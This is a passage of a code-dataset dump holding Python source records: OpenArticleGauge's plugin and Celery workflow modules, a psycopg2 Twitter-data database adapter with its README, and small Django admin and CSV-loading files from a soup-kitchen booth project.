_load_callable(modpath, call):\n # now, do some introspection to get a handle on the callable\n try:\n mod = __import__(modpath, fromlist=[call])\n call_able = getattr(mod, call)\n return call_able\n except ImportError as e:\n # in this case it's possible that it's just a context thing, and\n # the class we're trying to load is in a different package.\n log.debug(\"import error loading \" + call + \" from \" + modpath + \" - path may not be accessible or available in this context\")\n return None\n except AttributeError as e:\n # found the module but failed to load the attribute (probably the\n # callable isn't in that module)\n log.error(\"attribute error loading \" + call + \" from \" + modpath + \" - path is valid, but callable isn't part of that module\")\n #raise e\n return None\n"
},
{
"alpha_fraction": 0.6121095418930054,
"alphanum_fraction": 0.6123979091644287,
"avg_line_length": 42.9029541015625,
"blob_id": "fd0857627a840e288047742c03405a0c560de63e",
"content_id": "6bd596a45cc597a38f14154c00ac42a37d8cbc34",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10405,
"license_type": "permissive",
"max_line_length": 228,
"num_lines": 237,
"path": "/openarticlegauge/plugin.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "from openarticlegauge import config, plugloader, recordmanager\nfrom openarticlegauge.licenses import LICENSES\nfrom openarticlegauge import oa_policy\nimport logging, requests\nfrom copy import deepcopy\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\nclass Plugin(object):\n \n ## Capabilities that must be implemented by the sub-class ##\n __version__ = \"0.0\"\n _short_name = \"vanilla_plugin\"\n \n def capabilities(self):\n \"\"\"\n Describe the capabilities of this plugin, in the following form:\n \n {\n \"type_detect_verify\" : True,\n \"canonicalise\" : [\"<supported type>\"],\n \"detect_provider\" : [\"<supported type>\"],\n \"license_detect\" : True\n }\n \n Omit any key for any feature that the plugin does not support, or set the\n value of the key to False\n \"\"\"\n return {}\n \n def type_detect_verify(self, bibjson_identifier):\n \"\"\"\n determine if the provided bibjson identifier has the correct type for this plugin, by\n inspecting first the \"type\" parameter, and then by looking at the form\n of the id. If it is tagged as a DOI, then verify that it is a valid one. \n \n Add \"type\" parameter to the bibjson_identifier object if successful.\n \"\"\"\n raise NotImplementedError(\"type_detect_verify has not been implemented\")\n \n def canonicalise(self, bibjson_identifier):\n \"\"\"\n create a canonical form of the identifier\n and insert it into the bibjson_identifier['canonical'].\n \"\"\"\n raise NotImplementedError(\"canonicalise has not been implemented\")\n \n def detect_provider(self, record):\n \"\"\"\n Attempt to determine information regarding the provider of the identifier.\n \n Identifier can be found in record[\"identifier\"].\n \n This function should - if successful - populate the record[\"provider\"] field\n (create if necessary), with any information relevant to downstream plugins\n (see back-end documentation for more information)\n \"\"\"\n raise NotImplementedError(\"detect_provider has not been implemented\")\n \n def supports(self, provider):\n \"\"\"\n Does the page_license method in this plugin support this provider\n \"\"\"\n raise NotImplementedError(\"supports has not been implemented\")\n \n def license_detect(self, record):\n \"\"\"\n Determine the licence conditions of the record. Plugins may achieve this by\n any means, although the record['provider']['url'] and record['provider']['doi']\n fields will be key pieces of information.\n \n Plugins should populate (create if necessary) record['bibjson'] and populate with\n a record containing a \"license\" as per the back-end and API documentation\n \"\"\"\n raise NotImplementedError(\"license_detect has not been implemented\")\n \n ## utilities that the sub-class can take advantage of ##\n \n def clean_url(self, url):\n # strip any leading http:// or https://\n if url.startswith(\"http://\"):\n url = url[len(\"http://\"):]\n elif url.startswith(\"https://\"):\n url = url[len(\"https://\"):]\n\n return url\n\n def clean_urls(self, urls):\n cleaned_urls = []\n for url in urls:\n cleaned_urls.append(self.clean_url(url))\n return cleaned_urls\n\n def simple_extract(self, lic_statements, record, url):\n \"\"\"\n Generic code which looks for a particular string in a given web page (URL),\n determines the licence conditions of the article and populates\n the record['bibjson']['license'] (note the US spelling) field.\n\n The URL it analyses, the statements it looks for and the resulting licenses\n are passed in. This is not a plugin for a particular publisher - it just\n contains (allows re-use) the logic that any \"dumb string matching\" plugin \n would use.\n\n :param handler: The name of the plugin which called this function to\n handle the record.\n :param handler_version: The __version__ of the plugin which called this\n function to handle the record.\n :param lic_statements: licensing statements to look for on this publisher's \n pages. Take the form of {statement: meaning}\n where meaning['type'] identifies the license (see licenses.py)\n and meaning['version'] identifies the license version (if available)\n See a publisher plugin for an example, e.g. bmc.py\n :param record: a request for the OAG status of an article, see OAG docs for\n more info.\n :param url: source url of the item to be fetched. This is where the HTML\n page that's going to be scraped is expected to reside.\n \"\"\"\n\n # get content\n r = requests.get(url)\n \n # see if one of the licensing statements is in content \n # and populate record with appropriate license info\n for statement_mapping in lic_statements:\n # get the statement string itself - always the first key of the dict\n # mapping statements to licensing info\n statement = statement_mapping.keys()[0]\n\n #import logging\n #logging.debug('Statement \"' + statement + '\"...')\n\n if statement in r.content:\n \n #logging.debug('... matches')\n\n # okay, statement found on the page -> get license type\n lic_type = statement_mapping[statement]['type']\n\n # license identified, now use that to construct the license object\n license = deepcopy(LICENSES[lic_type])\n license['open_access'] = oa_policy.oa_for_license(lic_type)\n # set some defaults which have to be there, even if empty\n license.setdefault('version','')\n license.setdefault('description','')\n license.setdefault('jurisdiction','') # TODO later (or later version of OAG!)\n \n # Copy over all information about the license from the license\n # statement mapping. In essence, transfer the knowledge of the \n # publisher plugin authors to the license object.\n # Consequence: Values coming from the publisher plugin overwrite\n # values specified in the licenses module.\n license.update(statement_mapping[statement])\n \n # add provenance information to the license object\n provenance = {\n 'date': datetime.strftime(datetime.now(), config.date_format),\n 'source': url,\n 'agent': config.agent,\n 'category': 'page_scrape', # TODO we need to think how the\n # users get to know what the values here mean.. docs?\n 'description': self.gen_provenance_description(url, statement),\n 'handler': self._short_name, # the name of the plugin processing this record\n 'handler_version': self.__version__ # version of the plugin processing this record\n }\n\n license['provenance'] = provenance\n\n record['bibjson'].setdefault('license', [])\n record['bibjson']['license'].append(license)\n\n #logging.debug('... does NOT match')\n \n def gen_provenance_description(self, source_url, statement):\n return 'License decided by scraping the resource at ' + source_url + ' and looking for the following license statement: \"' + statement + '\".'\n\n def gen_provenance_description_fail(self, source_url):\n return 'We have found it impossible or prohibitively difficult to decide what the license of this item is by scraping the resource at ' + source_url + '. See \"error_message\" in the \"license\" object for more information.'\n\n def describe_license_fail(self, record, source_url, why, suggested_solution='', licence_url=\"\"):\n recordmanager.add_license(\n record, \n source=source_url, \n error_message=why, \n suggested_solution=suggested_solution, \n url=licence_url,\n type=\"failed-to-obtain-license\",\n open_access=False,\n category=\"page_scrape\",\n provenance_description=self.gen_provenance_description_fail(source_url),\n handler=self._short_name,\n handler_version=self.__version__\n )\n\nclass PluginFactory(object):\n \n @classmethod\n def type_detect_verify(cls):\n # FIXME: this should be updated to utilise the \"capabilities\" aspect of the plugin\n plugins = []\n for plugin_class in config.type_detection:\n klazz = plugloader.load(plugin_class)\n if klazz is None:\n log.warn(\"unable to load plugin for detecting identifier type from \" + str(plugin_class))\n continue\n plugins.append(klazz()) # append an instance of the class\n return plugins\n \n @classmethod\n def canonicalise(cls, identifier_type):\n plugin_class = config.canonicalisers.get(identifier_type)\n klazz = plugloader.load(plugin_class)\n return klazz() # return an instance of the class\n \n @classmethod\n def detect_provider(cls, identifier_type):\n plugins = []\n for plugin_class in config.provider_detection.get(identifier_type, []):\n # all provider plugins run, until each plugin has had a go at determining provider information\n klazz = plugloader.load(plugin_class)\n plugins.append(klazz()) # append an instance of the class\n return plugins\n \n @classmethod\n def license_detect(cls, provider_record):\n for plugin_class in config.license_detection:\n log.debug(\"checking \" + plugin_class + \" for support of provider \" + str(provider_record))\n klazz = plugloader.load(plugin_class)\n if klazz is None:\n continue\n inst = klazz()\n \n if inst.supports(provider_record):\n log.debug(plugin_class + \" (\" + inst._short_name + \" v\" + inst.__version__ + \") services provider \" + str(provider_record))\n return inst\n return None\n"
},
{
"alpha_fraction": 0.6254295706748962,
"alphanum_fraction": 0.6265954971313477,
"avg_line_length": 42.62803268432617,
"blob_id": "31a318a6d33d5986c5b286b53fbfb07d9046cd70",
"content_id": "90ea9f699ad787234556909af87cbe3c079f542c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16296,
"license_type": "permissive",
"max_line_length": 156,
"num_lines": 371,
"path": "/openarticlegauge/workflow.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "from celery import chain\nfrom openarticlegauge import models, model_exceptions, config, cache, plugin, recordmanager\nimport logging\nfrom openarticlegauge.slavedriver import celery\n\nlogging.basicConfig(filename='oag.log',level=logging.DEBUG)\nlog = logging.getLogger(__name__)\n\ndef lookup(bibjson_ids):\n \"\"\"\n Take a list of bibjson id objects\n {\n \"id\" : \"<identifier>\",\n \"type\" : \"<type>\"\n }\n and process them, returning a models.ResultSet object of completed or incomplete results\n \"\"\"\n # FIXME: should we sanitise the inputs?\n \n # create a new resultset object\n log.debug(\"looking up ids: \" + str(bibjson_ids))\n rs = models.ResultSet(bibjson_ids)\n \n # now run through each passed id, and either obtain a cached copy or \n # inject it into the asynchronous back-end\n for bid in bibjson_ids:\n # first, create the basic record object\n record = { \"identifier\" : bid }\n log.debug(\"initial record \" + str(record))\n \n # trap any lookup errors\n try:\n # Step 1: identifier type detection/verification\n _detect_verify_type(record)\n log.debug(\"type detected record \" + str(record))\n \n # Step 1a: if we don't find a type for the identifier, there's no point in us continuing\n if record.get(\"identifier\", {}).get(\"type\") is None:\n raise model_exceptions.LookupException(\"unable to determine the type of the identifier\")\n \n # Step 2: create a canonical version of the identifier for cache keying\n _canonicalise_identifier(record)\n log.debug(\"canonicalised record \" + str(record))\n \n # Step 3: check the cache for an existing record\n cached_copy = _check_cache(record)\n log.debug(\"cached record \" + str(cached_copy))\n \n # this returns either a valid, returnable copy of the record, or None\n # if the record is not cached or is stale\n if cached_copy is not None:\n if cached_copy.get('queued', False):\n record['queued'] = True\n elif cached_copy.has_key('bibjson'):\n record['bibjson'] = cached_copy['bibjson']\n log.debug(\"loaded from cache \" + str(record))\n rs.add_result_record(record)\n log.debug(str(bid) + \" added to result, continuing ...\")\n continue\n \n # Step 4: check the archive for an existing record\n archived_bibjson = _check_archive(record)\n log.debug(\"archived bibjson: \" + str(archived_bibjson))\n \n # this returns either a valid, returnable copy of the record, or None\n # if the record is not archived, or is stale\n if archived_bibjson is not None:\n record['bibjson'] = archived_bibjson\n log.debug(\"loaded from archive \" + str(archived_bibjson))\n rs.add_result_record(record)\n continue\n\n # Step 5: we need to check to see if any record we have has already\n # been queued. In theory, this step is pointless, but we add it\n # in for completeness, and just in case any of the above checks change\n # in future\n if record.get(\"queued\", False):\n # if the item is already queued, we just need to update the \n # cache (which may be a null operation anyway), and then carry on\n # to the next record\n _update_cache(record)\n log.debug(\"caching record \" + str(record))\n continue\n \n # Step 6: if we get to here, we need to set the state of the record\n # queued, and then cache it.\n record['queued'] = True\n _update_cache(record)\n log.debug(\"caching record \" + str(record))\n \n # Step 7: the record needs the licence looked up on it, so we inject\n # it into the asynchronous lookup workflow\n _start_back_end(record)\n \n except model_exceptions.LookupException as e:\n record['error'] = e.message\n \n # write the resulting record into the result set\n rs.add_result_record(record)\n \n # finish by returning the result set\n return rs\n\ndef _check_archive(record):\n \"\"\"\n check the record archive for a copy of the bibjson record\n \"\"\"\n if not record.has_key('identifier'):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key('canonical'):\n raise model_exceptions.LookupException(\"can't look anything up in the archive without a canonical id\")\n \n # obtain a copy of the archived bibjson\n log.debug(\"checking archive for canonical identifier: \" + record['identifier']['canonical'])\n archived_bibjson = models.Record.check_archive(record['identifier']['canonical'])\n \n # if it's not in the archive, return\n if archived_bibjson is None:\n log.debug(record['identifier']['canonical'] + \" is not in the archive\")\n return None\n \n # if there is archived bibjson, then we need to check whether it is stale\n # or not\n if _is_stale(archived_bibjson):\n log.debug(record['identifier']['canonical'] + \" is in the archive, but is stale\")\n return None\n \n # otherwise, just return the archived copy\n log.debug(record['identifier']['canonical'] + \" is in the archive\")\n return archived_bibjson\n\ndef _update_cache(record):\n \"\"\"\n update the cache, and reset the timeout on the cached item\n \"\"\"\n if not record.has_key('identifier'):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key('canonical'):\n raise model_exceptions.LookupException(\"can't create/update anything in the cache without a canonical id\")\n \n # update or create the cache\n cache.cache(record['identifier']['canonical'], record)\n \ndef _invalidate_cache(record):\n \"\"\"\n invalidate any cache object associated with the passed record\n \"\"\"\n if not record.has_key('identifier'):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key('canonical'):\n raise model_exceptions.LookupException(\"can't invalidate anything in the cache without a canonical id\")\n \n cache.invalidate(record['identifier']['canonical'])\n\ndef _is_stale(bibjson):\n \"\"\"\n Do a stale check on the bibjson object.\n \"\"\"\n return cache.is_stale(bibjson)\n\ndef _check_cache(record):\n \"\"\"\n check the live local cache for a copy of the object. Whatever we find,\n return it (a record of a queued item, a full item, or None)\n \"\"\"\n if not record.has_key('identifier'):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key('canonical'):\n raise model_exceptions.LookupException(\"can't look anything up in the cache without a canonical id\")\n \n log.debug(\"checking cache for key: \" + record['identifier']['canonical'])\n cached_copy = cache.check_cache(record['identifier']['canonical'])\n \n # if it's not in the cache, then return\n if cached_copy is None:\n log.debug(record['identifier']['canonical'] + \" not found in cache\")\n return None\n \n # if the cached copy exists ...\n \n # first check to see if the cached copy is already on the queue\n if cached_copy.get('queued', False):\n log.debug(record['identifier']['canonical'] + \" is in the cache and is queued for processing\")\n return cached_copy\n \n # next check to see if the cached copy has a bibjson record in it\n if cached_copy.has_key('bibjson'):\n # if it does, we need to see if the record is stale. If so, we remember that fact,\n # and we'll deal with updating stale items later (once we've checked bibserver)\n if _is_stale(cached_copy['bibjson']):\n log.debug(record['identifier']['canonical'] + \" is in the cache but is a stale record\")\n _invalidate_cache(record)\n return None\n \n # otherwise, just return the cached copy\n log.debug(record['identifier']['canonical'] + \" is in the cache\")\n return cached_copy\n\ndef _canonicalise_identifier(record):\n \"\"\"\n load the appropriate plugin to canonicalise the identifier. This will add a \"canonical\" field\n to the \"identifier\" record with the canonical form of the identifier to be used in cache control and bibserver\n lookups\n \"\"\"\n # verify that we have everything required for this step\n if not record.has_key(\"identifier\"):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key(\"id\"):\n raise model_exceptions.LookupException(\"bibjson identifier object does not contain an 'id' field\")\n \n if not record['identifier'].has_key(\"type\"):\n raise model_exceptions.LookupException(\"bibjson identifier object does not contain a 'type' field\")\n \n # load the relevant plugin based on the \"type\" field, and then run it on the record object\n p = plugin.PluginFactory.canonicalise(record['identifier']['type'])\n if p is None:\n raise model_exceptions.LookupException(\"no plugin for canonicalising \" + record['identifier']['type'])\n p.canonicalise(record['identifier'])\n\ndef _detect_verify_type(record):\n \"\"\"\n run through a set of plugins which will detect the type of id, and verify that it meets requirements\n \"\"\"\n # verify that the record has an identifier key, which is required for this operation\n if not record.has_key(\"identifier\"):\n raise model_exceptions.LookupException(\"no identifier in record object\")\n \n if not record['identifier'].has_key(\"id\"):\n raise model_exceptions.LookupException(\"bibjson identifier object does not contain an 'id' field\")\n \n # run through /all/ of the plugins and give each a chance to augment/check\n # the identifier\n plugins = plugin.PluginFactory.type_detect_verify()\n for p in plugins:\n p.type_detect_verify(record['identifier'])\n \ndef _start_back_end(record):\n \"\"\"\n kick off the asynchronous licence lookup process. There is no need for this to return\n anything, although a handle on the asynchronous is provided for convenience of\n testing\n \"\"\"\n log.debug(\"injecting record into asynchronous processing chain: \" + str(record))\n ch = chain(detect_provider.s(record), provider_licence.s(), store_results.s())\n r = ch.apply_async()\n return r\n\n############################################################################\n# Celery Tasks\n############################################################################ \n\[email protected](name=\"openarticlegauge.workflow.detect_provider\")\ndef detect_provider(record):\n # Step 1: see if we can actually detect a provider at all?\n # as usual, this should never happen, but we should have a way to \n # handle it\n if not record.has_key(\"identifier\"):\n return record\n \n if not record['identifier'].has_key(\"type\"):\n return record\n \n # Step 2: get the provider plugins that are relevant, and\n # apply each one until a provider string is added\n plugins = plugin.PluginFactory.detect_provider(record['identifier'][\"type\"])\n for p in plugins:\n log.debug(\"applying plugin \" + str(p._short_name))\n p.detect_provider(record)\n \n # we have to return the record, so that the next step in the chain\n # can deal with it\n log.debug(\"yielded result \" + str(record))\n return record\n \[email protected](name=\"openarticlegauge.workflow.provider_licence\")\ndef provider_licence(record):\n # Step 1: check that we have a provider indicator to work from\n if not record.has_key(\"provider\"):\n log.debug(\"record has no provider, so unable to look for licence: \" + str(record))\n return record\n \n # Step 2: get the plugin that will run for the given provider\n p = plugin.PluginFactory.license_detect(record[\"provider\"])\n if p is None:\n log.debug(\"No plugin to handle provider: \" + str(record['provider']))\n return record\n log.debug(\"Plugin \" + str(p) + \" to handle provider \" + str(record['provider']))\n \n # Step 3: run the plugin on the record\n if \"bibjson\" not in record:\n # if the record doesn't have a bibjson element, add a blank one\n record['bibjson'] = {}\n p.license_detect(record)\n \n # was the plugin able to detect a licence?\n # if not, we need to add an unknown licence for this provider\n if \"license\" not in record['bibjson'] or len(record['bibjson'].get(\"license\", [])) == 0:\n log.debug(\"No licence detected by plugin \" + p._short_name + \" so adding unknown licence\")\n recordmanager.add_license(record, \n url=config.unknown_url,\n type=\"failed-to-obtain-license\",\n open_access=False,\n error_message=\"unable to detect licence\",\n category=\"failure\",\n provenance_description=\"a plugin ran and failed to detect a license for this record. This entry records that the license is therefore unknown\",\n handler=p._short_name,\n handler_version=p.__version__\n )\n # describe_license_fail(record, \"none\", \"unable to detect licence\", \"\", config.unknown_url, p._short_name, p.__version__)\n\n # we have to return the record so that the next step in the chain can\n # deal with it\n log.debug(\"plugin \" + str(p) + \" yielded result \" + str(record))\n return record\n\[email protected](name=\"openarticlegauge.workflow.store_results\")\ndef store_results(record):\n # Step 1: ensure that a licence was applied, and if not apply one\n if \"bibjson\" not in record:\n # no bibjson record, so add a blank one\n log.debug(\"record does not have a bibjson record.\")\n record['bibjson'] = {}\n \n if \"license\" not in record['bibjson'] or len(record['bibjson'].get(\"license\", [])) == 0:\n # the bibjson record does not contain a license list OR the license list is of zero length\n log.debug(\"Licence could not be detected, therefore adding 'unknown' licence to \" + str(record['bibjson']))\n recordmanager.add_license(record,\n url=config.unknown_url,\n type=\"failed-to-obtain-license\",\n open_access=False,\n error_message=\"unable to detect licence\",\n category=\"failure\",\n provenance_description=\"no plugin was found that would try to detect a licence. This entry records that the license is therefore unknown\",\n )\n # describe_license_fail(record, \"none\", \"unable to detect licence\", \"\", config.unknown_url)\n \n # Step 2: unqueue the record\n if record.has_key(\"queued\"):\n log.debug(str(record['identifier']) + \": removing this item from the queue\")\n del record[\"queued\"]\n \n # Step 3: update the archive\n _add_identifier_to_bibjson(record['identifier'], record['bibjson'])\n log.debug(str(record['identifier']) + \": storing this item in the archive\")\n models.Record.store(record['bibjson'])\n \n # Step 4: update the cache\n log.debug(str(record['identifier']) + \": storing this item in the cache\")\n _update_cache(record)\n \n # we have to return the record so that the next step in the chain can\n # deal with it (if such a step exists)\n log.debug(\"yielded result \" + str(record))\n return record\n\ndef _add_identifier_to_bibjson(identifier, bibjson):\n # FIXME: this is pretty blunt, could be a lot smarter\n if not bibjson.has_key(\"identifier\"):\n bibjson[\"identifier\"] = []\n found = False\n for identifier in bibjson['identifier']:\n if identifier.has_key(\"canonical\") and identifier['canonical'] == bibjson['identifier']['canonical']:\n found = True\n break\n if not found:\n bibjson['identifier'].append(identifier)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.727544903755188,
"alphanum_fraction": 0.7395209670066833,
"avg_line_length": 18.647058486938477,
"blob_id": "082dc075bab36d2474cec6d8efe79fdbb79a17b1",
"content_id": "eb8510048ba3bbfcd5e6a2498af709a1ed885cac",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 334,
"license_type": "permissive",
"max_line_length": 57,
"num_lines": 17,
"path": "/openarticlegauge/slavedriver.py",
"repo_name": "rossmounce/OpenArticleGauge",
"src_encoding": "UTF-8",
"text": "from __future__ import absolute_import\n\nfrom celery import Celery\n\ncelery = Celery()\n\nfrom openarticlegauge import celeryconfig\n\ncelery.config_from_object(celeryconfig)\n\n# Optional configuration, see the application user guide.\ncelery.conf.update(\n CELERY_TASK_RESULT_EXPIRES=3600,\n)\n\nif __name__ == '__main__':\n celery.start()\n"
}
] | 7 |
m-goldstein/utilize | https://github.com/m-goldstein/utilize | 64ac8d3d4ab478bf58d3afc11930980ab4223b3f | 1eb7034f82c89f81935b15fd4f16bd62b2fc6c74 | 626567bbcb6c94459a1edf73db3add34d7813968 | refs/heads/master | 2023-02-21T11:07:27.658525 | 2021-01-11T02:44:15 | 2021-01-11T02:44:15 | 328,522,942 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7960000038146973,
"alphanum_fraction": 0.7960000038146973,
"avg_line_length": 61.5,
"blob_id": "9107e1a539f6888fd81099f6a59ce110961eef7a",
"content_id": "7b7656f41a278e7fc4a708e245fe4b2d7d1250f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 250,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 4,
"path": "/README.md",
"repo_name": "m-goldstein/utilize",
"src_encoding": "UTF-8",
"text": "# utilize\nrun ./config to set up the nonrelational database. \nthen check here for updates on how to set up the relational database.\nI have postgresql database adapter which this timescaledb uses so i figured the compatability would be on our side...\n"
},
{
"alpha_fraction": 0.5578824877738953,
"alphanum_fraction": 0.5642815828323364,
"avg_line_length": 30.066265106201172,
"blob_id": "957536215933db60f6e6c1f2701cc5096ad153d9",
"content_id": "5caa91af5be743fd7e377368f4a812780835eb8b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5157,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 166,
"path": "/src/postgres_adapter.py",
"repo_name": "m-goldstein/utilize",
"src_encoding": "UTF-8",
"text": "\"\"\"\nThis file is a generic postgres database for a scraper.\nWe will tweak it to our operation. \n\"\"\"\nimport psycopg2\nimport os\n#################################################################\ncommands = (\n# This is a generic table entry\n\"\"\"\nCREATE TABLE %s (\n id VARCHAR(255) PRIMARY KEY,\n timestamp VARCHAR(255),\n username VARCHAR(15), \n sent_to VARCHAR(255),\n replies INTEGER,\n retweets INTEGER,\n favorites INTEGER,\n text VARCHAR(512),\n geo VARCHAR(255),\n mentions VARCHAR(255),\n hashtags VARCHAR(255),\n permalink VARCHAR(255)\n);\n\"\"\")\ncommands2 = (\n\"\"\"\nCREATE TABLE %s (\n id INTEGER PRIMARY KEY,\n username VARCHAR(255)\n);\n\"\"\")\n#################################################################\nclass TwitterDBClient():\n HOST = 'localhost'\n DB_NAME = 'utilizedb'\n TABLE_NAME = 'utilize_data'\n USER = 'utilize'\n PASSWD = ''\n session = None\n cursor = None\n def init_session(self, host=HOST, db=DB_NAME,user=USER,passwd=PASSWD):\n\t if host is None:\n\t\t print(\"[init_session] Error: No host provided.\\n\")\n\t\t return None\n\t if db is None:\n\t\t print(\"[init_session] Error: No database specified.\\n\")\n\t\t return None\n\t try:\n\t\t if passwd is None or passwd == '':\n\t\t\t self.session = psycopg2.connect(host=host, database=db, user=user)\n\t\t else:\n\t\t\t self.session = psycopg2.connect(host=host, database=db, user=user, password=passwd)\n\t\t self.cursor = self.session.cursor()\n\t except:\n\t\t print(\"[init_session] Error: could not connect to host %s\"%(host))\n \n def create_table(self, table_name=TABLE_NAME, preparedStmt=commands):\n\t if table_name is None:\n\t\t print(\"[create_table] Error: table name not specified.\\n\")\n\t\t return None\n\t if preparedStmt is None:\n\t\t print(\"[create_table] Error: no table structure provided.\\n\")\n\t\t return None\n\t try:\n\t\t self.cursor.execute(preparedStmt%(table_name))\n\t\t self.session.commit()\n\t\t print(\"[create_table] Table %s created.\\n\"%(table_name))\n\t except:\n\t\t print(\"[create_table] Error: table creation failed.\\n\")\n\t\t return None\n \n def delete_table(self, table_name=None):\n\t if table_name is None:\n\t\t print(\"[delete_table] Error: no table name provided.\\n\")\n\t\t return None\n\t sql = \"DROP TABLE %s\"%(table_name)\n\t try:\n\t\t self.cursor.execute(sql)\n\t\t self.session.commit()\n\t except:\n\t\t print(\"[delete_table] Error: could not delete table.\\n\")\n\t\t self.session.commit()\n\t\t return None\n \n def insert_row_by_id(self, table_name=TABLE_NAME, row_id=None):\n\t if row_id is None:\n\t\t print(\"[insert_row_by_id] Error: no row id provided.\\n\")\n\t\t return None\n\t sql = \"\"\"INSERT INTO %s(id)\"\"\"%(table_name)\n\t sql += \"\"\" VALUES(%s);\"\"\"\n\t try:\n\t\t if row_id is int:\n\t\t\t row_id = str(row_id)\n\t\t sql = sql%(\"'\"+str(row_id)+\"'\")\n\t\t self.cursor.execute(sql)\n\t\t self.session.commit()\n\t except:\n\t\t print(\"[insert_row_by_id] Error: could not insert row.\\n\")\n\t\t print(\"SQL: %s\"%(sql))\n\t\t self.session.commit()\n\t\t return None\n \n def populate_row_data(self, table_name=TABLE_NAME, row_id=None, row_data=None):\n\t if row_id is None:\n\t\t print(\"[populate_row_data] Error: no row id provided.\\n\")\n\t\t return None\n\t if row_data is None:\n\t\t print(\"[populate_row_data] Error: no row data provided.\\n\")\n\t\t return None\n\t try:\n\t\t if row_id is int:\n\t\t\t row_id = str(row_id)\n\t\t sql = \"\"\"UPDATE %s\"\"\"%(table_name)\n\t\t select_clause = \" WHERE id = '%s';\"%(row_id)\n\t\t key_list = [key for key in row_data.keys()]\n\t\t for key in key_list:\n\t\t\t if key == 'id':\n\t\t\t\t #self.insert_row_by_id(table_name, row_data[key])\n\t\t\t\t continue\n\t\t\t if key == 'to':\n\t\t\t\t row_data['sent_to'] = row_data['to']\n\t\t\t\t key = 'sent_to'\n\t\t\t if key == 'text':\n\t\t\t\t try:\n\t\t\t\t\t sql = \"UPDATE %s\"%(table_name)\n\t\t\t\t\t sql += \" SET %s = \\'%s\\'\"%(key, str(row_data[key]))\n\t\t\t\t\t sql += select_clause\n\t\t\t\t\t try:\n\t\t\t\t\t\t self.cursor.execute(sql)\n\t\t\t\t\t\t self.session.commit()\n\t\t\t\t\t\t continue\n\t\t\t\t\t except:\n\t\t\t\t\t\t print(\"Error: malformed text.\")\n\t\t\t\t\t\t print(\"\\t%s\"%(row_data[key]))\n\t\t\t\t\t\t self.session.commit()\n\t\t\t\t\t\t continue\n\t\t\t\t except:\n\t\t\t\t\t pass\n\t\t\t sql = \"UPDATE %s\"%(table_name)\n\t\t\t sql += \" SET %s = '%s' \"%(key, str(row_data[key]))\n\t\t\t sql += select_clause\n\t\t\t #print(sql)\n\t\t\t try:\n\t\t\t\t self.cursor.execute(sql)\n\t\t\t\t self.session.commit()\n\t\t\t except:\n\t\t\t\t print(\"[populate_row_data] Error: could not execute query '%s'.\\n\"%(sql))\n\t\t\t\t self.session.commit()\n\t\t\t\t return None\n\t except:\n\t\t print(\"[populate_row_data] Error: could not insert row data\\n\")\n\t\t return None\n\n def insert_row(self, table=TABLE_NAME, row_data=None):\n\t if row_data is None:\n\t\t print(\"[insert_row] Error: row_data is none.\\n\")\n\t\t return None\n\t try:\n\t\t row_id = row_data['id']\n\t\t self.insert_row_by_id(table, str(row_id))\n\t\t self.populate_row_data(table, str(row_id), row_data)\n\t except:\n\t\t print(\"[insert_row] Error: could not insert row.\\n\")\n\t\t self.session.commit()\n\t\t return None\n"
}
] | 2 |
seosaju/SoupKitchen | https://github.com/seosaju/SoupKitchen | c1d2fd4e080961a4ccbc573133afbb70e755637f | 168ae39cbe2f90a8f3ad82853eb3cc2c8f0f75a2 | a31f6fea8c1d2a9b890f923b17b8f2a39a86637d | refs/heads/master | 2020-05-13T14:31:08.082199 | 2020-05-05T10:43:59 | 2020-05-05T10:43:59 | 181,632,312 | 0 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6765957474708557,
"alphanum_fraction": 0.6765957474708557,
"avg_line_length": 21.380952835083008,
"blob_id": "cdbb311088aa6b631d38d93079f9dabf4660be33",
"content_id": "2ebfba9c44834a672effce870dd60c5bcbd3768e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 21,
"path": "/booth/admin.py",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Booth, Company\n\n\nclass BoothInline(admin.TabularInline):\n model = Booth\n fields = ['name', 'contact', 'road_address']\n\n\[email protected](Booth)\nclass BoothAdmin(admin.ModelAdmin):\n list_display = ['name', 'contact', 'company', 'road_address']\n search_fields = ['name']\n\n\[email protected](Company)\nclass CompanyAdmin(admin.ModelAdmin):\n search_fields = ['name']\n inlines = [\n BoothInline,\n ]\n"
},
{
"alpha_fraction": 0.5575757622718811,
"alphanum_fraction": 0.581818163394928,
"avg_line_length": 19.625,
"blob_id": "7e25d3ccb00adb50d38d6996badb68b778ca4208",
"content_id": "05dfdd2820735cf000aec380da311f1436f681d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/load_csv.py",
"repo_name": "seosaju/SoupKitchen",
"src_encoding": "UTF-8",
"text": "import csv\n\n\ndef load(path):\n with open(path, 'r', encoding='cp949') as f:\n reader = csv.reader(f)\n csv_list = list(reader)[1:]\n return csv_list\n"
},
{
